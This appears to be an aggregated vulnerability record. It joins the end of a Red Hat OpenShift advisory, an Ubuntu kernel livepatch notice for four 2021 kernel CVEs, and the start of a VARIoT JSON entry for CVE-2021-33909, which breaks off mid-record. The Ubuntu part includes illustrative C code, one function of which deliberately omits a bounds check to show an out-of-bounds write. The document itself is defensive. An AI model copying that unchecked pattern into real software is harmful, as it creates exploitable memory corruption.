- should update to 7.5.5 for grafana resources version label 1967832 - Add more tests for periodic.go 1967833 - Add tasks pool to tasks_processing 1967842 - Production logs are spammed on "OCS requirements validation status Insufficient hosts to deploy OCS. 
A minimum of 3 hosts is required to deploy OCS" 1967843 - Fix null reference to messagesToSearch in gather_logs.go 1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring 1967933 - Network-Tools debug scripts not working as expected 1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: "mkdir: cannot create directory '/var/lib/pgsql/data/userdata': Permission denied" 1968019 - drain timeout and pool degrading period is too short 1968067 - [master] Agent validation not including reason for being insufficient 1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed 1968175 - [4.8.0] Agent validation not including reason for being insufficient 1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration 1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn't be required 1968435 - [4.8.0] Unclear message in case of missing clusterImageSet 1968436 - Listeners timeout updated to remain using default value 1968449 - [4.8.0] Wrong Install-config override documentation 1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters 1968452 - [4.8.0] [doc] "Mirror Registry Configuration" doc section needs clarification of functionality and limitations 1968454 - [4.8.0] backend events generated with wrong namespace for agent 1968455 - [4.8.0] Assisted Service operator's controllers are starting before the base service is ready 1968515 - oc should set user-agent when talking with registry 1968531 - Sync upstream 1.8.0 downstream 1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn't clean up properly 1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted 1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox 1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil 1968701 - Bare metal IPI installation is failed due to worker inspection failure 1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed 1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning 1969284 - Console Query Browser: Can't reset zoom to fixed time range after dragging to zoom 1969315 - [4.8.0] BMAC doesn't check if ISO Url changed before queuing BMH for reconcile 1969352 - [4.8.0] Creating BareMetalHost without the "inspect.metal3.io" does not automatically add it 1969363 - [4.8.0] Infra env should show the time that ISO was generated. 
1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it 1969386 - Filesystem's Utilization doesn't show in VM overview tab 1969397 - OVN bug causing subports to stay DOWN fails installations 1969470 - [4.8.0] Misleading error in case of install-config override bad input 1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step 1969525 - Replace golint with revive 1969535 - Topology edit icon does not link correctly when branch name contains slash 1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it 1969551 - [4.8.0] Assisted service times out on GetNextSteps due tooc adm release infotaking too long 1969561 - Test "an end user can use OLM can subscribe to the operator" generates deprecation alert 1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire 1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io 1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1 1969626 - Portfoward stream cleanup can cause kubelet to panic 1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out 1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check 1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso 1969752 - [4.8.0] [assisted operator] Installed Clusters are missing DNS setups 1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml 1969784 - WebTerminal widget should send resize events 1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails 1969891 - Fix rotated pipelinerun status icon issue in safari 1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse 1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available 1969951 - Cluster local doesn't work for knative services created from dev console 1969969 - ironic-rhcos-downloader container uses and old base image 1970062 - ccoctl does not work with STS authentication 1970068 - ovnkube-master logs "Failed to find node ips for gateway" error 1970126 - [4.8.0] Disable "metrics-events" when deploying using the operator 1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change 1970262 - [4.8.0] Remove Agent CRD Status fields not needed 1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs 1970269 - [4.8.0] missing role in agent CRD 1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs 1970381 - Monitoring dashboards: Custom time range inputs should retain their values 1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed 1970401 - [4.8.0] AgentLabelSelector is required yet not supported 1970415 - SR-IOV Docs needs documentation for disabling port security on a network 1970470 - Add pipeline annotation to Secrets which are created for a private repo 1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod 1970624 - 4.7->4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io 1970828 - "500 Internal Error" for all openshift-monitoring routes 1970975 - 4.7 -> 4.8 upgrades on AWS take longer than expected 1971068 - Removing invalid AWS instances from the CF templates 1971080 - 4.7->4.8 CI: KubePodNotReady 
due to MCD's 5m sleep between drain attempts 1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 ! 1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces 1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing "Validated" condition about VIP not matching machine network 1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn't work - clusteroperator/kube-apiserver is not upgradeable 1971589 - [4.8.0] Telemetry-client won't report metrics in case the cluster was installed using the assisted operator 1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service 1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery 1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409) 1971739 - Keep /boot RW when kdump is enabled 1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly 1972128 - ironic-static-ip-manager container still uses 4.7 base image 1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are 1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster 1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted 1972262 - [4.8.0] "baremetalhost.metal3.io/detached" uses boolean value where string is expected 1972426 - Adopt failure can trigger deprovisioning 1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage 1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration 1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall 1972565 - performance issues due to lost node, pods taking too long to relaunch 1972662 - DPDK KNI modules need some additional tools 1972676 - Requirements for authenticating kernel modules with X.509 1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings 1972690 - [4.8.0] infra-env condition message isn't informative in case of missing pull secret 1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration 1972768 - kube-apiserver setup fail while installing SNO due to port being used 1972864 - Newlocal-with-fallback` service annotation does not preserve source IP 1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8 1973117 - No storage class is installed, OCS and CNV installations fail 1973233 - remove kubevirt images and references 1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. 1973428 - Placeholder bug for OCP 4.8.0 image release 1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped 1973672 - fix ovn-kubernetes NetworkPolicy 4.7->4.8 upgrade issue 1973995 - [Feature:IPv6DualStack] tests are failing in dualstack 1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings 1974447 - Requirements for nvidia GPU driver container for driver toolkit 1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. 
1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel 1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion 1974746 - [4.8.0] File system usage not being logged appropriately 1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. 1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster 1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string 1974850 - [4.8] coreos-installer failing Execshield 1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift 1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing 1975155 - Kubernetes service IP cannot be accessed for rhel worker 1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types 1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData 1975404 - [4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified 1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve 1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn 1975672 - [4.8.0] Production logs are spammed on "Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient" 1975789 - worker nodes rebooted when we simulate a case where the api-server is down 1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s] 1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn't work - ingresscontroller "default" is degraded 1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted 1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts 1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO 1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1 1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO 1977352 - [4.8.0] [SNO] No DNS to cluster API from assisted-installer-controller 1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes 1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses 1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8 1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and redeploying assisted-service pod 1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used 1980788 - NTO-shipped stalld can segfault 1981633 - enhance service-ca injection 1982250 - Performance Addon Operator fails to install after catalog source becomes ready 1982252 - olm Operator is in CrashLoopBackOff state with error "couldn't cleanup cross-namespace ownerreferences"

  1. References:

https://access.redhat.com/security/cve/CVE-2016-2183
https://access.redhat.com/security/cve/CVE-2020-7774
https://access.redhat.com/security/cve/CVE-2020-15106
https://access.redhat.com/security/cve/CVE-2020-15112
https://access.redhat.com/security/cve/CVE-2020-15113
https://access.redhat.com/security/cve/CVE-2020-15114
https://access.redhat.com/security/cve/CVE-2020-15136
https://access.redhat.com/security/cve/CVE-2020-26160
https://access.redhat.com/security/cve/CVE-2020-26541
https://access.redhat.com/security/cve/CVE-2020-28469
https://access.redhat.com/security/cve/CVE-2020-28500
https://access.redhat.com/security/cve/CVE-2020-28852
https://access.redhat.com/security/cve/CVE-2021-3114
https://access.redhat.com/security/cve/CVE-2021-3121
https://access.redhat.com/security/cve/CVE-2021-3516
https://access.redhat.com/security/cve/CVE-2021-3517
https://access.redhat.com/security/cve/CVE-2021-3518
https://access.redhat.com/security/cve/CVE-2021-3520
https://access.redhat.com/security/cve/CVE-2021-3537
https://access.redhat.com/security/cve/CVE-2021-3541
https://access.redhat.com/security/cve/CVE-2021-3636
https://access.redhat.com/security/cve/CVE-2021-20206
https://access.redhat.com/security/cve/CVE-2021-20271
https://access.redhat.com/security/cve/CVE-2021-20291
https://access.redhat.com/security/cve/CVE-2021-21419
https://access.redhat.com/security/cve/CVE-2021-21623
https://access.redhat.com/security/cve/CVE-2021-21639
https://access.redhat.com/security/cve/CVE-2021-21640
https://access.redhat.com/security/cve/CVE-2021-21648
https://access.redhat.com/security/cve/CVE-2021-22133
https://access.redhat.com/security/cve/CVE-2021-23337
https://access.redhat.com/security/cve/CVE-2021-23362
https://access.redhat.com/security/cve/CVE-2021-23368
https://access.redhat.com/security/cve/CVE-2021-23382
https://access.redhat.com/security/cve/CVE-2021-25735
https://access.redhat.com/security/cve/CVE-2021-25737
https://access.redhat.com/security/cve/CVE-2021-26539
https://access.redhat.com/security/cve/CVE-2021-26540
https://access.redhat.com/security/cve/CVE-2021-27292
https://access.redhat.com/security/cve/CVE-2021-28092
https://access.redhat.com/security/cve/CVE-2021-29059
https://access.redhat.com/security/cve/CVE-2021-29622
https://access.redhat.com/security/cve/CVE-2021-32399
https://access.redhat.com/security/cve/CVE-2021-33034
https://access.redhat.com/security/cve/CVE-2021-33194
https://access.redhat.com/security/cve/CVE-2021-33909
https://access.redhat.com/security/updates/classification/#moderate

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ
d4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26
Z7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs
ImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h
gep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8
TWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX
X//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb
1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA
mtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/
0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6
dpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx
+bLvJlpGiMg=
=NJcM
-----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS
  • Ubuntu 18.04 LTS
  • Ubuntu 16.04 ESM
  • Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Maxim Levitsky discovered that the KVM hypervisor implementation for AMD processors in the Linux kernel did not properly prevent a guest VM from enabling AVIC in nested guest VMs. An attacker in a guest VM could use this to write to portions of the host’s physical memory. (CVE-2021-3653)

Maxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor implementation for AMD processors in the Linux kernel allowed a guest VM to disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker in a guest VM could use this to read or write portions of the host’s physical memory. (CVE-2021-3656)

Andy Nguyen discovered that the netfilter subsystem in the Linux kernel contained an out-of-bounds write in its setsockopt() implementation. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-22555)
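
The flaw follows a classic pattern: structure sizes taken from userspace feed an offset calculation inside the kernel's compat translation path, and a memset() of "padding" then lands outside the destination buffer. Below is a minimal userspace sketch of that bug class, deliberately not the actual netfilter code; the buffer size, function names, and the bounds check in the fixed variant are illustrative assumptions.

/* Sketch of the CVE-2021-22555 bug class (hypothetical, userspace). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KBUF_SIZE 64  /* illustrative kernel-side buffer size */

/* BUG: 'usersize' and 'kernsize' come from userspace, but nothing checks
 * that the memset stays inside the KBUF_SIZE-byte destination buffer. */
static void translate_entry(char *kbuf, size_t usersize, size_t kernsize)
{
    memset(kbuf + usersize, 0, kernsize - usersize);
}

/* Fixed variant: reject sizes that would step outside the buffer. */
static void translate_entry_fixed(char *kbuf, size_t usersize, size_t kernsize)
{
    if (usersize > kernsize || kernsize > KBUF_SIZE) {
        fprintf(stderr, "rejecting bogus sizes %zu/%zu\n", usersize, kernsize);
        return;
    }
    memset(kbuf + usersize, 0, kernsize - usersize);
}

int main(void)
{
    char *kbuf = malloc(KBUF_SIZE);
    if (!kbuf)
        return 1;

    translate_entry(kbuf, 16, 32);        /* in bounds: harmless */
    /* translate_entry(kbuf, 16, 128); */ /* would zero bytes 16..127 of a
                                             64-byte buffer: heap OOB write */
    translate_entry_fixed(kbuf, 16, 128); /* same input, safely rejected */

    free(kbuf);
    return 0;
}

In the kernel analogue, the bytes clobbered past the buffer belong to an adjacent heap object, which is what makes this class exploitable rather than merely a crash.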

It was discovered that the virtual file system implementation in the Linux kernel contained an unsigned to signed integer conversion error. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-33909)
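
What makes this class dangerous is that the conversion is silent: C narrows an out-of-range size_t to int with no runtime diagnostic, so a length above INT_MAX wraps negative and later pointer arithmetic lands far outside the buffer. A minimal sketch of the conversion itself, assuming only standard C (this is not the actual fs/seq_file.c code):

/* Sketch of the size_t-to-int narrowing behind CVE-2021-33909. */
#include <limits.h>
#include <stdio.h>

int main(void)
{
    size_t path_len = (size_t)INT_MAX + 2;  /* e.g. a >2 GiB mount path */

    int narrowed = (int)path_len;  /* implementation-defined: wraps negative
                                      on typical two's-complement targets */
    printf("size_t %zu becomes int %d\n", path_len, narrowed);

    /* In the vulnerable pattern, something like
     *     p = buf + buf_size - narrowed;
     * then points roughly 2 GiB before the allocation, turning what looked
     * like a bounds-checked write into an out-of-bounds write. */
    return 0;
}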

Update instructions

The problem can be corrected by updating your kernel livepatch to the following versions:

Ubuntu 20.04 LTS:
  • gcp - 81.1
  • generic - 81.1
  • gke - 81.1
  • gkeop - 81.1
  • lowlatency - 81.1

Ubuntu 18.04 LTS:
  • generic - 81.1
  • gke - 81.1
  • gkeop - 81.1
  • lowlatency - 81.1
  • oem - 81.1

Ubuntu 16.04 ESM:
  • generic - 81.1
  • lowlatency - 81.1

Ubuntu 14.04 ESM:
  • generic - 81.1
  • lowlatency - 81.1

Support Information

Kernels older than the levels listed below do not receive livepatch updates. If you are running a kernel at an earlier level than those shown, please upgrade your kernel as soon as possible (a minimal version-check sketch follows the lists).

Ubuntu 20.04 LTS:
  • linux-aws - 5.4.0-1009
  • linux-azure - 5.4.0-1010
  • linux-gcp - 5.4.0-1009
  • linux-gke - 5.4.0-1033
  • linux-gkeop - 5.4.0-1009
  • linux-oem - 5.4.0-26
  • linux - 5.4.0-26

Ubuntu 18.04 LTS:
  • linux-aws - 4.15.0-1054
  • linux-gke-4.15 - 4.15.0-1076
  • linux-gke-5.4 - 5.4.0-1009
  • linux-gkeop-5.4 - 5.4.0-1007
  • linux-hwe-5.4 - 5.4.0-26
  • linux-oem - 4.15.0-1063
  • linux - 4.15.0-69

Ubuntu 16.04 ESM:
  • linux-aws - 4.4.0-1098
  • linux-azure - 4.15.0-1063
  • linux-azure - 4.15.0-1078
  • linux-hwe - 4.15.0-69
  • linux - 4.4.0-168
  • linux - 4.4.0-211

Ubuntu 14.04 ESM:
  • linux-lts-xenial - 4.4.0-168
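
As a rough way to automate that comparison, the sketch below reads the running kernel release via uname(2) and checks it against one of the minimum levels above. The "major.minor.patch-abi" parse and the hard-coded 5.4.0-26 baseline (the Ubuntu 20.04 LTS generic kernel from the list) are assumptions for illustration; adjust them for your release and kernel flavour.

/* Sketch: compare the running kernel against a minimum livepatch level. */
#include <stdio.h>
#include <sys/utsname.h>

int main(void)
{
    struct utsname u;
    if (uname(&u) != 0) {
        perror("uname");
        return 1;
    }

    int maj = 0, min = 0, patch = 0, abi = 0;
    /* Parse e.g. "5.4.0-26-generic"; the trailing flavour is ignored. */
    if (sscanf(u.release, "%d.%d.%d-%d", &maj, &min, &patch, &abi) < 4) {
        fprintf(stderr, "unexpected release format: %s\n", u.release);
        return 1;
    }

    const int req[4] = {5, 4, 0, 26};          /* assumed baseline */
    const int cur[4] = {maj, min, patch, abi};
    for (int i = 0; i < 4; i++) {
        if (cur[i] != req[i]) {
            printf("%s: %s for livepatch updates\n", u.release,
                   cur[i] > req[i] ? "eligible" : "too old");
            return 0;
        }
    }
    printf("%s: eligible for livepatch updates\n", u.release);
    return 0;
}

Compile with e.g. cc -o lpcheck lpcheck.c and run it on the host in question.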

References

  • CVE-2021-3653
  • CVE-2021-3656
  • CVE-2021-22555
  • CVE-2021-33909

-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202107-1361",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.134"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.52"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.13"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.276"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13.4"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.12.19"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.13"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.276"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.240"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.0"
      },
      {
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.12.43"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.198"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.52",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.19",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.13.4",
                "versionStartIncluding": "5.13",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.13",
                "versionStartIncluding": "3.12.43",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.276",
                "versionStartIncluding": "3.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.276",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.240",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.198",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.134",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
